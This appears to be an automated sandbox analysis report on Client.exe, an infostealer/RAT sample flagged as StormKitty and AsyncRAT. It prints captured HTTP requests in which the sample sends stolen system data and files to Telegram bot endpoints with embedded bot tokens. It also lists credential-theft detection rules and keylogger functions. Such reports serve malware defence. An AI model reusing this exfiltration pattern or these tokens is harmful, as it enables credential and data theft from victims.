Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="4918a032-b9c9-40e8-81a3-dfca8ed2bf78"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 72.245.12.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue

Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Client.exe	String found in binary or memory: https://api.telegram.org/bot
Source: Client.exe	String found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
Source: Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619
Source: Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191
Source: Client.exe	String found in binary or memory: https://api.telegram.org/file/bot
Source: Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Client.exe	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: Client.exe	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.0.dr, tmpE267.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: tmpE267.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49714 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Contains functionality to capture screen (.Net source)

Source: Client.exe, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: Client.exe, Keylogger.cs	.Net Code: SetHook
Source: Client.exe, Keylogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\Client.exe	File deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT\EFOYFBOLXA.jpg	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docx	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\GAOBCVIQIJ.pdf	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	File deleted: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT\BNAGMGSPLO.pdf	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Client.exe, type: SAMPLE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Client.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Client.exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: Client.exe, type: SAMPLE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Client.exe, type: SAMPLE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_016B6378	0_2_016B6378
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_016B5AA8	0_2_016B5AA8
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_016B5760	0_2_016B5760
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_016B9740	0_2_016B9740
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_016B9730	0_2_016B9730
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C705F0	0_2_05C705F0
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C70600	0_2_05C70600
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C7C108	0_2_05C7C108
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C7C0F7	0_2_05C7C0F7
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C75D52	0_2_05C75D52
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C75D60	0_2_05C75D60

Source: Client.exe, 00000000.00000002.4562029762.000000000142E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs Client.exe

Source: Client.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Client.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Client.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: Client.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Client.exe, type: SAMPLE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: Client.exe, Settings.cs

Base64 encoded string: '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

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@17/139@4/4

Source: C:\Users\user\Desktop\Client.exe

File created: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Client.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03

Source: C:\Users\user\Desktop\Client.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE154.tmp

Jump to behavior

Source: Client.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Client.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
